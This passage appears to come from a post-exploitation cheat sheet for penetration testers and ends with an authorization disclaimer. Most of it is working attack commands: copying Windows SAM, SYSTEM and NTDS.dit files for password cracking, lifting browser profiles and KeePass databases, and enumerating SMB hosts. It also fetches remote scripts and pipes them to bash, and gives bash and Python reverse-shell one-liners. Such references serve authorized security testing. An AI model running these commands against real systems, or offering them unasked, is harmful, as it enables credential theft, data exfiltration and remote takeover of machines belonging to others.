steghide embed -cf image.jpg -ef secret.txtIf Windows systems are accessible from the compromised Linux host:
# Install tools
apt-get install cifs-utils # Debian/Ubuntu
yum install cifs-utils # RHEL/CentOS
# Mount SMB share
mount -t cifs //windows-host/share /mnt/share -o user=username,password=password
# Mount without password (if accessible)
mount -t cifs //windows-host/share /mnt/share -o guest
# Read NTFS partition (if Windows is on same machine)
apt-get install ntfs-3g
mount -t ntfs-3g /dev/sda1 /mnt/windows# SAM/SYSTEM files (for offline password cracking)
cp /mnt/windows/Windows/System32/config/SAM /tmp/
cp /mnt/windows/Windows/System32/config/SYSTEM /tmp/
# Use samdump2 or similar
samdump2 /tmp/SYSTEM /tmp/SAM
# NTDS.dit (if Domain Controller)
cp /mnt/windows/Windows/NTDS/ntds.dit /tmp/
# Browser data
cp -r /mnt/windows/Users/*/AppData/Local/Google/Chrome /tmp/
cp -r /mnt/windows/Users/*/AppData/Roaming/Mozilla/Firefox /tmp/
# Credential files
find /mnt/windows/Users -name "*.kdbx" 2>/dev/null # KeePass
find /mnt/windows/Users -name "Credentials" 2>/dev/null# Enum4linux
enum4linux -a windows-host
# SMBClient
smbclient -L //windows-host -U username
smbclient //windows-host/share -U username
# CrackMapExec
crackmapexec smb 192.168.1.0/24
crackmapexec smb 192.168.1.10 -u username -p password --shares
# List users
rpcclient -U "" windows-host
> enumdomusers
> queryuser <rid>While manual enumeration is important, these tools can speed up the process:
- LinPEAS - Linux Privilege Escalation Awesome Script
- LinEnum - Linux Enumeration Script
- Linux Smart Enumeration (lse.sh) - Another enumeration script
- pspy - Monitor processes without root
- GTFOBins - Curated list of Unix binaries for privilege escalation
# Download from your server
wget http://your-server/script.sh -O /tmp/script.sh
chmod +x /tmp/script.sh
/tmp/script.sh
# Or in one line
curl http://your-server/script.sh | bash
wget -O- http://your-server/script.sh | bash
# Using only what's on the system
# If Python available:
python -c "import urllib; urllib.urlretrieve('http://your-server/script.sh', '/tmp/script.sh')"
# If Perl available:
perl -e 'use LWP::Simple; getstore("http://your-server/script.sh", "/tmp/script.sh")'# Find world-writable directories outside home
find / \( -path /home -prune -o -path /proc -prune \) -o -type d -perm -0002 -ls 2>/dev/null
# Find world-writable files
find / \( -path /proc -prune -o -path /home -prune \) -o -type f -perm -0002 -ls 2>/dev/null
# Find files with SUID/SGID set
find / -type f \( -perm -4000 -o -perm -2000 \) -ls 2>/dev/null
# Find writable config files
find /etc -writable -type f 2>/dev/null
# Check for Docker
docker ps 2>/dev/null && echo "Docker accessible!"
# Check if we can read /root
ls -la /root 2>/dev/null && echo "Can read /root!"
# Find readable log files
find /var/log -type f -perm -004 2>/dev/null
# Check for interesting groups
id | grep -E 'docker|lxd|sudo|wheel|disk|adm|video'
# Quick reverse shell (adjust IP and port)
bash -c 'bash -i >& /dev/tcp/10.0.0.1/1234 0>&1'
# Python reverse shell one-liner
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'IMPORTANT: This document is for authorized security testing only.
- Always obtain written authorization before testing
- Stay within the scope of your engagement
- Document all actions taken
- Report findings responsibly
- Delete any tools or backdoors after testing
- Follow responsible disclosure practices
Unauthorized access to computer systems is illegal under:
- Computer Fraud and Abuse Act (CFAA) in the US
- Computer Misuse Act in the UK
- Similar legislation in other countries
Always ensure you have proper authorization and stay within legal boundaries.
Version: 2.0
Last Updated: December 2025
Maintained by: Security Research Team
This document is a living reference and should be updated as new techniques and tools emerge.
For the latest version and contributions, please refer to the repository.